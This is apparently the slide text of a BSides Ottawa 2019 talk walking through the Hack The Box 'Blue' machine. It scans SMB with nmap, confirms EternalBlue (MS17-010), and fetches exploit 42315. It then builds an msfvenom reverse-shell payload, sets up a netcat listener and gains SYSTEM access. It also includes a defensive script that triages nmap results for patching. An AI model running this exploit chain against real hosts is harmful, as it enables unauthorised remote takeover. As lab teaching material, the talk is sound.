WHOAMI
• Diana Whitney
• IT Security Specialist at EWA-Canada since 2015
• Payment Assurance Lab – PCI PTS POI Standards testing
• Secure That Cert! CySA+ and PenTest+
RECON WITH NMAP
• nmap -sC -sV -O -oA initial 10.10.10.40
• -sC scans the target using the default Nmap scripts
• -sV attempts to identify the version of services found running on open ports
• -O attempts to ID the host’s operating system
• -oA outputs the scan results into a file called ‘initialscan’
• 10.10.10.40 is our target
• Port 139 is open and running netbios-ssn
• Port 445 is running Microsoft-ds
• Ports 135, 49152-7 are running msrpc
Our scripts used the SMB protocol running on the open ports to learn more about the host:
• OS – Windows 7 Pro
• Security mode
MORE NMAP
• Initial scan only scans the top 1000 ports
• Adding -p- to the command tells nmap to scan all 65535 ports
• To scan UDP ports instead of TCP ports
• nmap -sU -O -p- -oA udpfull 10.10.10.40
NMAP VULNERABILITY SCRIPTS
• nmap --script vuln -oA vulnerabilities 10.10.10.40
• Previous scan used nmap’s default scripts – fast and non-invasive
• Vulnerability scripts will look for any potential exploits on the open ports
• Script smb-vuln-ms17-010 returned a positive result
• Code execution vulnerability in MS SMBv1 servers
• CVE-2017-0143 - EternalBlue
• Developed by the NSA and leaked by the Shadow Brokers hacker group in 2017
• Exploits the SMBv1 protocol in unpatched Windows servers
• Allows a remote attacker to execute arbitrary code on a vulnerable machine by sending specially crafted packets
• Used in the WannaCry and NotPetya ransomware attacks of 2017
• CVE-2017-0143
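A defender’s way to put the -oA output to use, as an added example that is not part of the talk: parse the .xml report Nmap writes for hosts that still expose SMB (ports 139/445) and that smb-vuln-ms17-010 flagged VULNERABLE, so they can be queued for patching. SAMPLE_XML is a constructed stand-in shaped like Nmap’s XML (the element names address, port, state, hostscript, script and elem are the ones Nmap emits); it is not a capture of the scan in the slides.

```python
"""Triage the .xml report written by nmap -oA for hosts that still expose SMB
and that the smb-vuln-ms17-010 NSE script marked VULNERABLE. Added example,
not from the talk; SAMPLE_XML is constructed to look like Nmap XML output."""
import xml.etree.ElementTree as ET

SMB_PORTS = {"139", "445"}  # netbios-ssn and microsoft-ds from the slides

SAMPLE_XML = """\
<nmaprun scanner="nmap" args="nmap --script vuln -oA vulnerabilities 10.10.10.40">
  <host>
    <address addr="10.10.10.40" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="CVE-2017-0143">
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

def triage(xml_text):
    """Return one record per host: address, open SMB ports, and whether the
    smb-vuln-ms17-010 script reported state VULNERABLE (unpatched SMBv1)."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        smb_ports = sorted(
            p.get("portid") for p in host.iter("port")
            if p.get("portid") in SMB_PORTS
            and p.find("state") is not None
            and p.find("state").get("state") == "open")
        ms17_010 = any(
            elem.text == "VULNERABLE"
            for script in host.iter("script") if script.get("id") == "smb-vuln-ms17-010"
            for elem in script.iter("elem") if elem.get("key") == "state")
        findings.append({"host": addr, "smb_ports": smb_ports, "ms17_010": ms17_010})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_XML):
        print(finding)  # patching queue: hosts with ms17_010 True go first
```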
• searchsploit --id ms17-010
• Searchsploit is a command line search tool for Exploit-DB
• Not using Metasploit
• Searches for possible exploits for this vulnerability – we will use 42315
• searchsploit -m 42315
• Mirrors the exploit onto our machine
• 42315.py
LET’S EXAMINE THE CONTENTS OF 42315.PY…
• There will be a function call for ‘mysmb’
• We can get it from the provided URL using wget
• File will be saved as 42315.py.1, since we already have a 42315.py
• Change the filename:
• mv 42315.py.1 mysmb.py
• The script requires credentials in order to exploit the target
• We find them using enum4linux
• Since ‘none’ is an option, we can assume this machine allows us to log in with no username or password.
• Last, we need to modify the python code to add a payload
• This will be the executable file we send to the target machine and have it run
• To gain access to the target, we’ll send a payload that will set up a reverse shell request
• Generate the payload using MSFVenom
• msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.x LPORT=4444 > eternalblue.exe
• -p – our payload – windows/shell_reverse_tcp
• -f format – exe
• LHOST – the IP address of our attack machine (local host) – 10.10.14.7
• Your IP address can be found on HTB ‘Access’ page, or by running ifconfig
• LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for anything else
• eternalblue.exe – the executable file generated by this command
• Alter the script to send eternalblue.exe from its location on the host machine to the target machine
• Script will then execute eternalblue.exe on the target machine
• Use Netcat to set up a listener on the attacking machine
• nc -nvlp 4444
• The attack machine is now listening for an incoming request from the target machine
• Now run the python script
• python 42315.py 10.10.10.40
WHEN the python script runs successfully, the reverse shell request will be received by the attack machine. We now have access to the target. Run ‘whoami’ in
No privilege escalation required – EternalBlue has granted us system access
HTB: BLUE
Thank you!

BSides Ottawa 2019 - HTB Blue
